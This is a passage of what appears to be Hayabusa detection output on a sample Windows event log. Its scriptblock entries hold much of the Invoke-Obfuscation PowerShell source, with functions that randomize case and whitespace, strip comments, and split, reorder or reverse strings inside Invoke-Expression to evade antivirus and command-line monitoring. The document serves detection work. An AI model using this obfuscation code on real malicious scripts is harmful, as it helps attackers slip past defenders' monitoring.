arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. 
.EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. $InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. 
Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . 
if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. 
.EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. 
.EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). 
$ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. 
$DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. 
If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. 
If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. 
Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. 
If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. 
